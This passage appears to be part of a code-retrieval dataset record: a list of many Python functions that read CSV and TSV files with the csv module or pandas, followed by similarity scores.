data_manager.get_table_from_file(file_name)\n\n else:\n ui.print_error_message(\"There is no file to read!\")\n table = []\n\n return table", "def load_from_table(filename: str) -> List[Sample]:\n with open(filename, \"r+\", newline=\"\") as f:\n reader = csv.reader(f)\n return samples_from_iterator(reader)", "def read(tablename: str()):\n return pd.read_csv(tablename, dtype={'source_id': str})", "def populate_table_from_csv(csv_file, csv_encoding='iso-8859-15'):\n try:\n with open(file=csv_file, mode='r', encoding=csv_encoding) as input_file:\n # Could find a good place to add iterators/generators/comprehensions elsewhere, so made a new function\n # Also, yet another pylint false positive. The below line isn't supposed to be assigned to anything.\n [add_customer(*l.split(',')) for l in input_file if 'Id,Name,Last_name,' not in l] # pylint: disable=W0106\n except Exception as e:\n logger.error(\"Failed to load records from csv file %s into database %s: %s\", csv_file, customer_db.database, e)", "def readFile(self,path):\n _file = pd.read_csv(path, sep='\\s+', engine='python', header=None)\n self._dataTable = pd.DataFrame(_file.iloc[:, 3:15])\n self._dataTable.columns = ['MGEMLEEF Avg age', 'MOSHOOFD Customer main type', 'MGODRK Roman catholic',\n 'MGODPR Protestant', 'MGODOV Other religion', 'MGODGE No religion', 'MRELGE Married',\n 'MRELSA Living together', 'MRELOV Other relation', 'MFALLEEN Singles',\n 'MFGEKIND Household without children', 'MFWEKIND Household with children']", "def __obtain_data_from_csv__(self, csvfile):\n data = csvfile.readlines()\n data = self.__parse_string_for_delimiter__(data)\n return data", "def from_csv(self,path):\n self.csv_path = path\n\n try:\n fh = open(self.csv_path, \"r\")\n except IOError:\n print(\"Error: no such file or directory\") \n\n self.csv_dataframe = pd.DataFrame(pd.read_csv(self.csv_path, header=0, keep_default_na=False)).dropna(axis=0, how='any')\n test = pd.DataFrame(pd.read_csv(self.csv_path)).dropna(axis=0, how='any')\n types = [0 for i in range(len(test.dtypes))]\n a = fh.readline()\n a = a[:-1] # remove '\\n'\n x = a.split(',') # x stores the name of each column\n fh.close()\n\n #type transformation\n for i in range(len(test.dtypes)):\n if test.dtypes[i].name[0:3] == 'int' or test.dtypes[i].name[0:5] == 'float':\n if (x[i][0] == \"'\" or x[i][0] == '\"'):\n x[i] = x[i].replace('\\'', '').replace('\"', '')\n for j in test[x[i]]:\n if not (j == 0 or (j > 1000 and j < 2100)):\n types[i] = test.dtypes[i].name[0:5]\n break\n else:\n types[i] = 'year'\n elif test.dtypes[i].name[0:6] == 'object':\n if (x[i][0] == \"'\" or x[i][0] == '\"'):\n x[i] = x[i].replace('\\'', '').replace('\"', '')\n for j in test[x[i]]:\n if j != 0 and not(re.search(r'\\d+[/-]\\d+[/-]\\d+', j)):\n types[i] = 'varchar'\n break\n else:\n types[i] = 'date'\n \n name = path.rsplit('/', 1)[-1][:-4]\n self.table_info(name, x, types)\n self.import_method = methods_of_import[2] # = 'csv'\n\n self.show_csv_info()", "def csv_delimiter_examples():\n number_table = read_csv_file(\"number_table.csv\", \" \")\n print_table(number_table)\n print()\n name_table = read_csv_file(\"name_table.csv\", \",\")\n print_table(name_table)", "def csv_delimiter_examples():\n number_table = read_csv_file(\"number_table.csv\", \" \")\n print_table(number_table)\n print()\n name_table = read_csv_file(\"name_table.csv\", \",\")\n print_table(name_table)", "def readRecordFromFile():\n\twith open(gbl.sourceFile, newline='') as csvfile:\n\t\trowReader = csv.reader(csvfile, delimiter=gbl.csvDiscriminator, quotechar=gbl.csvQuotechar)\n\t\tfor row in rowReader:\n\t\t\tROWData.append(row)", "def load_main_table(table_text):\n\n lines = table_text.split('\\n')\n i = 1\n cols = []\n for thing in lines[1].split('\",\"'):\n if thing in ['C ', 'I ', 'K ', 'E ', 'H ']:\n cols.append(thing.strip() + str(i) + ' ')\n if thing == 'H ':\n i += 1\n else:\n cols.append(thing)\n lines[1] = '\",\"'.join(cols)\n text = \"\\n\".join(lines[1:])\n df = pd.read_csv(StringIO(text))\n df.index = df['Student ID']\n\n return df", "def read_from_csv(file):\n with open(file) as f:\n next(f)\n data = []\n for line in csv.reader(f, delimiter='\\t'):\n data.append(list(line))\n return data", "def read_data_from_csv(csv_file, header=None, **kwargs):\n if os.path.isabs(csv_file) == False:\n path_to_csv = os.path.join(csv_file)\n else:\n path_to_csv = csv_file\n row_list = []\n if \"field_sep\" not in kwargs.keys():\n field_sep = ','\n else:\n field_sep = kwargs.get(\"field_sep\")\n with open(path_to_csv, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=field_sep, fieldnames=header)\n for record in csv_reader:\n if list(record.values())[0].startswith(\"#\") is not True:\n # IT'S A COMMENT IF IT STARTS WITH \"#\" \n # IF THIS IS YOUR HEADER ROW, SUPPLY A LIST OF COLUMN NAMES WHEN CALLING THE FUNCTION\n row_list.append(record)\n return row_list", "def import_files_table(path):\n return pd.read_csv(path, sep=\"\\t\", skiprows=1, header=0)", "def _read_csv(input_file):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f)\n lines = []\n for line in reader:\n lines.append(line)\n return lines[1:] # remove header", "def _load_csv(root_path, table_meta):\n relative_path = os.path.join(root_path, table_meta['path'])\n dtypes = _read_csv_dtypes(table_meta)\n\n data = pd.read_csv(relative_path, dtype=dtypes)\n data = _parse_dtypes(data, table_meta)\n\n return data", "def load_data(filename='KSI.csv'):\r\n d = []\r\n with open(filename) as csv_file:\r\n # csv_reader = csv.reader(csv_file, delimiter=',')\r\n csv_reader = csv.DictReader(csv_file, delimiter=',')\r\n for line_count, row in enumerate(csv_reader):\r\n if line_count == 0:\r\n print(f'Column names are \\n{\", \".join(row)}')\r\n # column_names = row\r\n else:\r\n d.append(row)\r\n # print(f'Processed {line_count} lines.')\r\n return d", "def read_csv(self):\n with open(self.csv_file, 'rU') as file_object:\n reader = csv.reader(file_object, delimiter=self.delimiter)\n if self.has_header_row:\n header_row = next(reader, None)\n if self.has_duplicate_column_names:\n header_counts_dict = dict()\n new_header_row = []\n for each_header in header_row:\n try:\n header_counts_dict[each_header] += 1\n except KeyError:\n header_counts_dict[each_header] = 1\n frequency = header_counts_dict[each_header]\n if frequency==1:\n new_header_row.append(each_header)\n else:\n new_header_row.append(each_header+str(frequency))\n header_row = new_header_row\n else:\n header_row = self.provided_headers_list\n rows = [\n { header: value for header, value in zip(header_row, next_row)}\n for next_row in reader\n ]\n return header_row, rows", "def from_csv(self, path):\n for model, table in [(self.Dataset, 'dataset'),\n (self.Datarun, 'datarun'),\n (self.Hyperpartition, 'hyperpartition'),\n (self.Classifier, 'classifier')]:\n df = pd.read_csv(os.path.join(path, '%ss.csv' % table))\n\n # parse datetime columns. This is necessary because SQLAlchemy can't\n # interpret strings as datetimes on its own.\n # yes, this is the easiest way to do it\n for c in inspect(model).attrs:\n if type(c) != ColumnProperty:\n continue\n col = c.columns[0]\n if type(col.type) == DateTime:\n df[c.key] = pd.to_datetime(df[c.key],\n infer_datetime_format=True)\n\n for _, r in df.iterrows():\n # replace NaN and NaT with None\n for k, v in list(r.iteritems()):\n if pd.isnull(v):\n r[k] = None\n\n # insert the row into the database\n create_func = getattr(self, 'create_%s' % table)\n create_func(**r)", "def import_data(csv_file):\n # skips bad lines\n data = pd.read_csv(csv_file, error_bad_lines=False)\n return data", "def import_dataset(fpath):\r\n data = read_csv(fpath)\r\n print(data.head())\r\n print(data.shape)\r\n return data", "def read_csv(\n type: CSVTypes,\n csv_file: UploadFile = File(...),\n db: Session = Depends(get_db),\n authorization: str = Header(None),\n settings: config.Settings = Depends(get_settings),\n):\n if authorization != settings.upload_secret:\n raise HTTPException(401, \"Operação inválida!\")\n\n lines = 0\n\n with csv_file.file as file:\n content = file.read()\n content = content.decode(\"utf-8\")\n content = content.split(\"\\n\")\n if type == CSVTypes.results:\n lines = len(import_results_csv(content, db))\n elif type == CSVTypes.templates_results:\n lines = len(import_templates_results_csv(content, db))\n elif type == CSVTypes.hospitals:\n lines = len(import_hospitals_csv(content, db))\n else:\n raise HTTPException(400)\n\n log(\"[CSV] CSV foi importado.\", db)\n\n return {\"lines\": lines}", "def import_rows(self, csv_file, table_id=None):\n if table_id:\n self.table_id = table_id\n\n params = {'startLine': 1, # skip cols?\n 'encoding': \"UTF-8\",\n 'delimiter': \",\",\n 'isStrict': True}\n\n media = MediaFileUpload(csv_file, mimetype='text/csv', resumable=True)\n self.request = self._table().importRows(tableId=self.table_id, media_body=media, **params)\n self._process_request(name='import_rows', resumable=True)\n \n # URL for new look \n logger.info(\"The fusion table is located at: {}\".format(\n self.build_uri('/view')))\n return True", "def read_csv_file(file_name, file_delimeter):\n \n with open(file_name, newline='') as csv_file: # don't need to explicitly close the file now\n csv_table = []\n csv_reader = csv.reader(csv_file, delimiter=file_delimeter)\n for row in csv_reader:\n csv_table.append(row)\n return csv_table", "def read_csv_file(file_name, file_delimeter):\n \n with open(file_name, newline='') as csv_file: # don't need to explicitly close the file now\n csv_table = []\n csv_reader = csv.reader(csv_file, delimiter=file_delimeter)\n for row in csv_reader:\n csv_table.append(row)\n return csv_table", "def load(self, path, separator=\",\", decoder=lambda j,v: v):\n # Date objects are saved and loaded as strings, but it is easy to convert these back to dates:\n # Table.columns[x].map(lambda s: date(s))\n data = open(path, \"rb\").read().lstrip(BOM_UTF8)\n data = StringIO(data)\n data = [row for row in csv.reader(data, delimiter=separator)]\n data = [[_eval(decoder(j,v)) for j,v in enumerate(row)] for row in data]\n return Table(data)", "def csv(self, file, table=None):\n\n if table:\n table.import_from_csv_file(file)\n else:\n db = self.db\n # This is the preferred method as it updates reference fields\n db.import_from_csv_file(file)\n db.commit()", "def read(self):\r\n\r\n self.data = []\r\n\r\n with open(self.filename + \".csv\", mode='r') as csv_file:\r\n reader = csv.DictReader(csv_file)\r\n for row in reader:\r\n self.data.append(row)", "def load_raw_table(conf, table):\n confrd = load_config_raw_data(conf)\n path_table = Path(confrd[table][\"path\"])\n sep = confrd[table][\"sep\"]\n encoding = confrd[table][\"encoding\"]\n df = pd.read_csv(path_table, sep=sep, encoding=encoding)\n return df", "def import_data(address):\n try:\n inputcsv = csv.reader(open(address, \"r\"), delimiter=\";\", lineterminator=\"\\n\")\n except IOError:\n print \"File not exists or is unreadable, please check it.\"\n exit(1)\n\n data = list() # all data\n item = list() # each tabular\n count = 0\n subcount = 0\n try:\n for row in inputcsv:\n if count < 2 : # read Time period and number of product\n data.append(int(row[1]))\n else :\n item.append(row[1:])\n subcount +=1 \n if subcount == data[1]:\n data.append(np.array(item, dtype=float))\n item = list()\n subcount = 0\n count += 1\n if (data[1] > 1):\n data.append(np.array(item, dtype=float)) # manage the last tabular\n except:\n print \"File is not well formated, please correct it.\"\n exit(1)\n return data", "def process_loading_file(self):\n column_headers = []\n column_headers_all = []\n\n # Open the file once to get idea of the total rowcount to display progress\n with open(self.csv_file_path[0], newline='') as csv_file:\n self.progress_max.emit(len(csv_file.readlines()) - 2)\n\n with open(self.csv_file_path[0], newline='') as csv_file:\n\n self.csv_data_table.setRowCount(0)\n self.csv_data_table.setColumnCount(0)\n\n csv_file_read = csv.reader(csv_file, delimiter=',', quotechar='|')\n\n # Fetch the column headers and move the iterator to actual data\n column_headers = next(csv_file_read)\n\n # Reflect back the changes in the reference to the column headers\n for header in column_headers:\n self.column_headers.append(header)\n # A backup to keep a list of all the headers to toogle their view later\n self.column_headers_all.append(header)\n\n # TODO: Increase the reading speed by decreasing load on actual table population\n\n # self.csv_data_table.hide()\n\n for row_data in csv_file_read:\n\n self.relay.emit(self.csv_data_table.rowCount())\n # self.relay.emit(self.x)\n # self.x = self.x + 1\n row = self.csv_data_table.rowCount()\n self.csv_data_table.insertRow(row)\n self.csv_data_table.setColumnCount(len(row_data))\n for column, stuff in enumerate(row_data):\n item = QTableWidgetItem(stuff)\n self.csv_data_table.setItem(row, column, item)\n\n self.csv_data_table.setHorizontalHeaderLabels(self.column_headers)\n\n # Set WordWrap to True to make the cells change height according to content\n # Currently set it to false as it looks very decent and makes cell size uniform throughout\n self.csv_data_table.setWordWrap(False)\n # Uncomment below line to stretch to fill the column width according to content\n # self.csv_data_table.resizeColumnsToContents()\n self.csv_data_table.resizeRowsToContents()\n\n # Update the bottom toolbar to reflect changes\n self.update_bottom_toolbar.emit()\n self.finished.emit()", "def read_csv(self, path):\n for file in os.listdir(path):\n if file[-4:] == \".csv\":\n name = file[:-4]\n table_index_header = cfg.get_list(\"table_index_header\", name)\n filename = os.path.join(path, file)\n self.input_data[name] = pd.read_csv(\n filename,\n index_col=list(range(int(table_index_header[0]))),\n header=list(range(int(table_index_header[1]))),\n squeeze=(\"series\" not in name),\n )\n self.check_input_data(warning=False)\n self.add_meta_data()\n return self", "def load_file(self):\n\n self.df = self.sqlContext.read.csv(self.source, sep=self.sep, header=True, inferSchema=True)", "def read_csv(csv_file):\r\n with open(csv_file, \"r\") as files:\r\n data = csv.reader(files)\r\n return list(data)", "def read_csv_data(csv_path):\n\n return pd.read_csv(csv_path, sep=',', engine='python')", "def read_data(self):\n fpath = './data/surveys.csv'\n self.data = pd.read_csv(fpath, header=0, low_memory=False)\n #print(self.data.head(n=5))\n print(self.data.shape)", "def read_csv(self, file: str, table: str, libref: str =\"\", nosub: bool =False, opts: dict = None) -> '<SASdata object>':\n opts = opts if opts is not None else {}\n\n code = \"filename x \"\n\n if file.lower().startswith(\"http\"):\n code += \"url \"\n\n code += \"\\\"\"+file+\"\\\";\\n\"\n code += \"proc import datafile=x out=\"\n if len(libref):\n code += libref+\".\"\n code += \"'\"+table.strip()+\"'n dbms=csv replace; \"+self._sb._impopts(opts)+\" run;\"\n\n if nosub:\n print(code)\n else:\n ll = self.submit(code, \"text\")", "def read_rf_csv():\n if os.path.exists(\"rf.csv\"):\n #print (\"--decision trees CSV imported\\n\")\n results = pd.read_csv(\"rf.csv\", index_col=0)\n else:\n print(\"log not found\")\n\n return results", "def read_csv_ur10(self, csv_file):\r\n df = pd.read_csv(csv_file, sep=';', decimal=',', header=0)\r\n return df", "def read_data():\n data = pd.read_csv('input_data/Preply_tutor_views_datasaet.csv')\n return data", "def load_tweets(fp):\r\n ans = pd.read_csv(fp, sep='\\t')\r\n return ans", "def readFile(filename):\n\twith open(filename, 'rU') as csvIN:\n\t\tnext(csvIN)\n\t\toutCSV=(line for line in csv.reader(csvIN, dialect='excel'))\n\t\tfor row in outCSV:\n e = Entry(row)\n e.pass_import()", "def test_misc_csv_read():\n r = csv_reader(\"../test/test.csv\")\n fields = r.hdr()\n data = str(fields)\n while True:\n row = r.row()\n if not row: break\n data += '\\n' + str(row)\n\n assert(data == \"\"\"\n['EVT_CODE*', 'EVT_DATE.DE', 'CODE', 'AGE', 'FRST', 'LST', 'SPEC', 'de.id']\n['tea', '2018/01/01', 'X', '35', 'PRE', 'WHO', 'BUG', '1']\n['coffee', '2018/05/05', 'X', '35', 'JAN,Z', 'WHO', 'FRG', '1']\n['water', '2018/01/01', 'Y', '35', 'TAN', 'POST', 'CAT', '2']\n \"\"\".strip())", "def load_data_from_csv(csv_file, users_to_i = {}, items_to_i = {}):\n raw_data = []\n with open(csv_file) as f:\n csvreader = csv.reader(f)\n # skipping first row (header)\n next(csvreader)\n for user, item in csvreader:\n raw_data.append((user, item))\n return load_data_from_array(raw_data, users_to_i, items_to_i)", "def loadData(path_file):\n data = pd.read_csv(path_file) \n data.head()\n return data", "def load_data_from_csv(csv_file):\n list=[]\n\n with open(csv_file) as csv_1:\n csv_out = csv.reader(csv_1) \n next(csv_out)\n for rows in csv_out: \n if len(rows) != 0:\n list.append([rows[0],int(rows[1]),int(rows[2])])\n \n return (list)", "def readcsv(path, delimiter= ','):\n my_data = genfromtxt(path, delimiter= delimiter)\n return my_data", "def load_data(csv_path):\n df = pd.read_csv(csv_path)\n return df", "def loadtable(header, rows, thousands=True):\n formatted = load_csv(header, rows, sep=\" \", thousands=thousands)\n header, rows = formatted[0], formatted[1:]\n\n return banner(header, rows)", "def dataLoad():\n try:\n try: #Python3\n f = open(__file__ + \".csv\",\"rt\")\n except: #Python2\n f = open(__file__ + \".csv\",\"rb\")\n data = f.read().split(',')\n entryCol.entry0.delete(0,END)\n entryCol.entry0.insert(0,data[0])\n entryCol.entry1.delete(0,END)\n entryCol.entry1.insert(0,data[1])\n entryCol.entry2.delete(0,END)\n entryCol.entry2.insert(0,data[2])\n entryCol.entry3.delete(0,END)\n entryCol.entry3.insert(0,data[3])\n botWind.writeN(\"DataLoad: File\")\n except:\n botWind.writeN(\"DataLoad: Default\")", "def read_data(path, filename, drop_col=\"index\", dt=\"float32\"):\n\tdata = pd.read_csv(path + filename, sep=\",\", dtype=dt)\n\tdata = data.drop(drop_col, axis=1)\n\treturn data.as_matrix()", "def read_csv(csv_file_path):\n res = [] #list\n # f = open(csv_file_path) #read file\n with open(csv_file_path,\"r\") as f:", "def read(self):\n with open(self.filename) as f:\n reader=csv.reader(f)\n for row in reader:\n self.data.appendleft(row)", "def load_csv(filename):\n # Open csvfile\n with open(filename) as csvfile:\n reader = csv.DictReader(csvfile)\n\n # Put data in gloabal list\n for row in reader:\n # Get data of subject with either or both milk and peanut allergy\n if row[\"MILK_ALG_START\"] != \"NA\" or row[\"PEANUT_ALG_START\"] != \"NA\":\n sub_list = list()\n for key in DATA_KEYS:\n sub_list.append(row[key])\n\n # Add data of subject to all data \n data_list.append(sub_list)", "def _read_csv(self):\n with open(self._file_path, 'rb') as f:\n reader = csv.DictReader(f, delimiter=',')\n self._content = [row for row in reader]", "def test_csvfile_single_row_of_data(fs: FakeFilesystem) -> None:\n contents = \"\"\"\"a\",\"b\"\n1,2\"\"\"\n fs.create_file(\"test.csv\", contents=contents)\n\n adapter = CSVFile(\"test.csv\")\n\n assert adapter.get_columns() == {\n \"a\": Float(\n filters=[Range, Equal, NotEqual, IsNull, IsNotNull],\n order=Order.NONE,\n exact=True,\n ),\n \"b\": Float(\n filters=[Range, Equal, NotEqual, IsNull, IsNotNull],\n order=Order.NONE,\n exact=True,\n ),\n }\n assert list(adapter.get_data({}, [])) == [{\"a\": 1.0, \"b\": 2.0, \"rowid\": 0}]", "def read(self, filename):\n lines = []\n rawData = []\n file = open(filename, \"rU\")\n csv_reader = csv.reader( file )\n for line in csv_reader:\n lines.append(line)\n for item in range(len(line)):\n line[item] = line[item].replace(\" \",\"\")\n self.headers = lines[0]\n self.types = lines[1]\n rawData = lines[2:]\n for row in rawData:\n newRow = []\n for i in range(len(row)):\n if self.types[i] != 'numeric':\n continue\n else:\n newRow.append(float((row[i].strip())))\n self.finalData.append(newRow)\n self.data = np.matrix(self.finalData)\n\n for i in range(len(self.types)):\n if self.types[i] == 'numeric':\n self.numHeadList.append(self.headers[i])\n i = 0\n for header in self.numHeadList:\n self.header2col[header] = i\n i += 1\n\n return self.data", "def read_csv_data(url):\n\n csv_data = pd.read_csv(url)\n\n return csv_data", "def _read_tsv(cls, input_file, quotechar='\"'):\n with tf.gfile.Open(input_file, \"r\") as f:\n reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)\n lines = []\n for line in reader:\n lines.append(line)\n return lines", "def read_csv(self, inputfile):\n d = csv.reader(inputfile)\n for row in d.read():\n self.translations[row[0]] = row[1]", "def load_data(filepath):\n with open(filepath) as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n yield row", "def read_csv(self, csv_file):\n mylog.debug('Reading csv file %s for data' % csv_file)\n csv_data = pandas.read_csv(csv_file)\n mylog.debug('Read of csv file complete.')\n #mylog.debug('%s' % csv_data)\n #sometimes the csv has an empty dataframe #\n if csv_data.empty:\n mylog.debug('Data frame is empty; repopuating data')\n csv_info = []\n for item in csv_data:\n #add the data one cell at a time to the list #\n #for some reason, some csvs have the data #\n #with random decimal points #\n csv_info.append(item.split(\".\")[0])\n df = pandas.DataFrame(columns=csv_info)\n df.loc[0]=csv_info\n #write the data from the list back into the cells#\n #one at a time #\n for column in range(0, len(csv_info)): \n df.iloc[0,column] = csv_info[column]\n csv_data = df \n return csv_data", "def load_from_csv(path, delimiter=','):\n return pd.read_csv(path,encoding = \"ISO-8859-1\",dtype=object)", "def ReadFromCSV(cls, year, grant_data, converter, calendar):\n\n def CheckExpectedTables(data, expected):\n if sorted(data.keys()) != sorted(expected):\n raise ValueError(\"Unexpected tables.\\n Expected: %s\\n Found: %s\" % (\n sorted(data.keys()), expected))\n\n def CreateStockTable(name, headings):\n return StockTable(name, year, headings, converter, calendar, grant_data)\n\n try:\n statements = cls.STATEMENT_FILES[year]\n except KeyError:\n raise NotImplementedError(\n \"Don't know what files to use for tax year %d\" % year)\n\n filenames = statements.values()\n if len(filenames) == 1:\n data = csvtable.ReadMultitableCSV(filenames[0], CreateStockTable)\n else:\n tablenames, filenames = statements.keys(), filenames\n constructors = [CreateStockTable] * len(statements)\n data = csvtable.ReadCSVTables(tablenames, filenames, constructors)\n CheckExpectedTables(grant_data, data.keys())\n\n return data", "def _csv_engine(filename, node):\n sep = node.get(\"sep\", \",\")\n header = node.get(\"header\", 0)\n logger.debug(\n \"Parsing CSV '{}'. sep={}, header={}.\".format(filename, sep, header)\n )\n index = node.get(\"index\")\n encoding = node.get(\"encoding\")\n if not index:\n raise InvalidConfig(\"An 'index' column is required. It should \"\n \"be the sample id column.\")\n\n df = pd.read_csv(filename, sep=sep, header=header, encoding=encoding)\n df.set_index(index, verify_integrity=True, inplace=True, drop=True)\n df.index = df.index.astype(str)\n\n return df", "def load_csv_model(filename) -> tuple:\n dat_sci = pd.read_csv(resources_folder(filename), index_col=0)\n commenter('data from ' + filename, lambda: print(dat_sci))\n\n ind = dat_sci.index\n # commenter('index', lambda: print(ind))\n col = dat_sci.columns\n # commenter('columns', lambda: print(col))\n # self.data = np.asmatrix(dat_sci.values)\n # commenter('data', lambda: print(self.data))\n # print(type(dat_sci))\n\n return dat_sci, ind, col", "def get_data_from_robot():\n file = ''\n if file:\n reader = csv.DictReader(open(file))\n data = []\n for row in reader:\n data.append([row])\n return data", "def read_table(filename, separator=',', dtype='float'):\n\n fp = open(filename, 'r')\n\n headers = fp.readline()\n\n # print \"headers = \", headers\n headers = [h.strip() for h in headers.split(separator)]\n headers.remove('')\n\n #print \"headers = \", headers\n\n columns = [[] for h in headers]\n #table = dict.fromkeys(headers, [])\n\n #table = Container.fromkeys(headers, [])\n\n #print \"table = \", table\n\n for line in fp.readlines():\n\n values = [h.strip() for h in line.split(separator)]\n values.remove('')\n\n #print \"values = \", values\n\n for k, v in enumerate(values):\n\n #print k, \" = \", v\n\n\n if dtype == \"float\":\n v = float(v)\n\n columns[k].append(v)\n #table[k].append(v)\n\n table = Container(**dict(list(zip(headers, columns))))\n table.headers = headers\n\n return table", "def read_data(path):\n data = pd.read_csv(path)\n return data", "def read_data(path):\n data = pd.read_csv(path)\n return data", "def ReadFromCSV(filename):\n\n class LocationTable(csvtable.CSVTable):\n\n def __init__(self, name, headings):\n super(LocationTable, self).__init__(name, headings)\n self.data = []\n\n def AddRow(self, row):\n self.CheckRow(row)\n self.data.append(Interval(*row))\n\n data = csvtable.ReadMultitableCSV(filename, LocationTable)\n expected_tables = [\"BUSINESSTRIPS\", \"RESIDENCE\"]\n\n if sorted(data.keys()) != expected_tables:\n raise ValueError(\"Unexpected tables.\\n Expected: %s\\n Found: %s\" % (\n sorted(data.keys()), expected_tables))\n\n return TaxCalendar(data[\"RESIDENCE\"].data, data[\"BUSINESSTRIPS\"].data)", "def load_csv(csvpath):\n with open(csvpath, \"r\") as csvfile:\n data = []\n csvreader = csv.reader(csvfile, delimiter=\",\")\n\n # Skip the CSV Header\n next(csvreader)\n\n # Read the CSV data\n for row in csvreader:\n data.append(row)\n return data", "def read(data_src):\n # 1. Retrieve data set from source\n if isinstance(data_src, pd.DataFrame):\n # a. DataFrame source\n # Check column names\n try:\n # Check data type\n _ = data_src.columns.astype(float)\n\n # Add column values\n data_src.loc[-1] = data_src.columns.to_numpy(dtype=float) # adding a row\n data_src.index = data_src.index + 1 # shifting index\n data_src.sort_index(inplace=True)\n\n # Rename column names\n vals = ['col_' + str(k) for k in np.arange(data_src.shape[1])]\n data_src.columns = vals\n except ValueError:\n pass\n except TypeError:\n pass\n print(\"Data fetched from DataFrame\")\n return DataGP.clean_data(data_src)\n else:\n # b. CSV file\n file = str(data_src)\n try:\n with open(file, 'r') as f:\n dialect = csv.Sniffer().sniff(f.readline(), delimiters=\";,' '\\t\")\n f.seek(0)\n reader = csv.reader(f, dialect)\n raw_data = list(reader)\n f.close()\n\n if len(raw_data) <= 1:\n raise Exception(\"CSV file read error. File has little or no data\")\n else:\n # print(\"Data fetched from CSV file\")\n # 2. Get table headers\n keys = np.arange(len(raw_data[0]))\n if raw_data[0][0].replace('.', '', 1).isdigit() or raw_data[0][0].isdigit():\n vals = ['col_' + str(k) for k in keys]\n header = np.array(vals, dtype='S')\n else:\n if raw_data[0][1].replace('.', '', 1).isdigit() or raw_data[0][1].isdigit():\n vals = ['col_' + str(k) for k in keys]\n header = np.array(vals, dtype='S')\n else:\n header = np.array(raw_data[0], dtype='S')\n raw_data = np.delete(raw_data, 0, 0)\n # titles = np.rec.fromarrays((keys, values), names=('key', 'value'))\n # return titles, np.asarray(raw_data)\n d_frame = pd.DataFrame(raw_data, columns=header)\n return DataGP.clean_data(d_frame)\n except Exception as error:\n raise Exception(\"Error: \" + str(error))", "def test_from_file_csv(self):\n with TemporaryDirectory() as tmp:\n fp, df_test = save_simple_dataframe(tmp, 'test.csv')\n df_read = BaseDataClass.from_file(fp).df\n self.assertEqual(\n pd.testing.assert_frame_equal(df_test, df_read),\n None,\n )", "def get_training_data(self, csv_path):\n data = pd.read_csv(csv_path)\n data[['Hashrate', 'Addresses', 'Supply', 'Trx_Fee', 'Daily_Trx']] = data[['Hashrate', 'Addresses', 'Supply', 'Trx_Fee', 'Daily_Trx']].apply(pd.to_numeric)\n data[['Timestamp']] = data[['Timestamp']].apply(pd.to_datetime)\n data = data[data['Timestamp'] < self.end_time]\n data = data[data['Timestamp'] > self.start_time]\n\n return data", "def read_tsv(path):\n return pd.read_csv(path, sep=\"\\t\", index_col=0)", "def import_from_csv(self) -> None:\n logging.info('import_from_csv')\n if self.target_table and str(self.target_table).lower() in [\"issue\", \"version\"]:\n if self.file_path and exists(self.file_path):\n # Read CSV file\n csv_data = pd.read_csv(self.file_path).to_dict('records')\n\n # Import Version\n if str(self.target_table).capitalize() == \"Version\":\n # Overwrite option\n if self.overwrite:\n self.session.query(Version).delete()\n click.echo('Overwrite Version table')\n\n for version in csv_data:\n if all(item in list(version.keys()) for item in ['tag', 'start_date', 'end_date']):\n newVersion=Version(\n project_id=version['project_id'],\n name=version[\"name\"], \n tag=version[\"tag\"], \n start_date=datetime.strptime(version[\"start_date\"], '%Y-%m-%d %H:%M:%S.%f'), \n end_date=datetime.strptime(version[\"end_date\"], '%Y-%m-%d %H:%M:%S.%f'), \n )\n \n try:\n self.session.add(newVersion)\n compute_version_metrics(self.session, self.configuration.current_branch, newVersion.project_id)\n click.echo('Importing ' + str(len(csv_data)) + ' version(s) on database')\n except Exception:\n logging.error(Exception)\n else:\n logging.error(\"CSV file no contain minimal mandatory fields\")\n sys.exit('CSV file no contain minimal mandatory fields')\n\n # Import Issue\n if str(self.target_table).capitalize() == \"Issue\":\n # Overwrite option\n if self.overwrite:\n self.session.query(Issue).delete()\n click.echo('Overwrite Issue table')\n\n for issue in csv_data:\n if all(item in list(issue.keys()) for item in ['number', 'created_at', 'updated_at']):\n newIssue=Issue(\n project_id=issue['project_id'],\n number=issue[\"number\"],\n title=issue[\"title\"],\n created_at=datetime.strptime(issue[\"created_at\"], '%Y-%m-%d %H:%M:%S.%f'),\n updated_at=datetime.strptime(issue[\"updated_at\"], '%Y-%m-%d %H:%M:%S.%f'))\n\n try:\n self.session.add(newIssue)\n click.echo('Importing ' + str(len(csv_data)) + ' issue(s) on database')\n except Exception:\n logging.error(Exception)\n else:\n logging.error(\"CSV file no contain minimal mandatory fields\")\n sys.exit('CSV file no contain minimal mandatory fields') \n\n self.session.commit()\n else:\n logging.error('File not found')\n sys.exit('File not found')\n else:\n logging.error('Target table not found')\n sys.exit('Target table not found')", "def run(self) -> pd.DataFrame:\n with open(self.file_path, 'r') as in_file:\n headers = in_file.readline()\n headers = headers.replace(\"\\n\", \"\")\n\n if ',' in headers:\n headers = headers.split(',')\n else:\n headers = headers.split()\n\n if headers == self.NORMAL_HEADERS:\n return self.normal_csv()\n else:\n return self.read_data_columns_to_rows()" ]
[ "0.8095777", "0.7471686", "0.7406693", "0.7337046", "0.7332259", "0.7143274", "0.69447905", "0.69225657", "0.68924946", "0.68774915", "0.6847433", "0.6822053", "0.6807061", "0.6763969", "0.6755038", "0.675341", "0.6733731", "0.67244375", "0.67158145", "0.67142403", "0.6712804", "0.6686776", "0.66596514", "0.6643881", "0.66405356", "0.66132224", "0.6608808", "0.6558562", "0.65575105", "0.6529429", "0.6527415", "0.6527415", "0.65225", "0.65192395", "0.6512353", "0.65110403", "0.6494256", "0.64807683", "0.6474674", "0.64685804", "0.6464597", "0.64587027", "0.64585185", "0.6456709", "0.64398193", "0.64048934", "0.6384188", "0.6384188", "0.638307", "0.6374308", "0.63730395", "0.6359743", "0.6355399", "0.63344043", "0.6330688", "0.6330272", "0.6313623", "0.63035506", "0.62998", "0.62995106", "0.6296893", "0.62759733", "0.62756217", "0.6272348", "0.6271794", "0.6257586", "0.62562984", "0.6252225", "0.6250873", "0.6250155", "0.62496364", "0.62408596", "0.62347317", "0.6231507", "0.62279373", "0.62023693", "0.62005085", "0.62002087", "0.6200039", "0.61946774", "0.61945635", "0.6183205", "0.61802244", "0.61782885", "0.6172457", "0.6168259", "0.61682", "0.6159136", "0.6154242", "0.615197", "0.6150946", "0.61492854", "0.61492854", "0.6145665", "0.614225", "0.6134886", "0.61345077", "0.61282045", "0.6127525", "0.6123948", "0.611712" ]
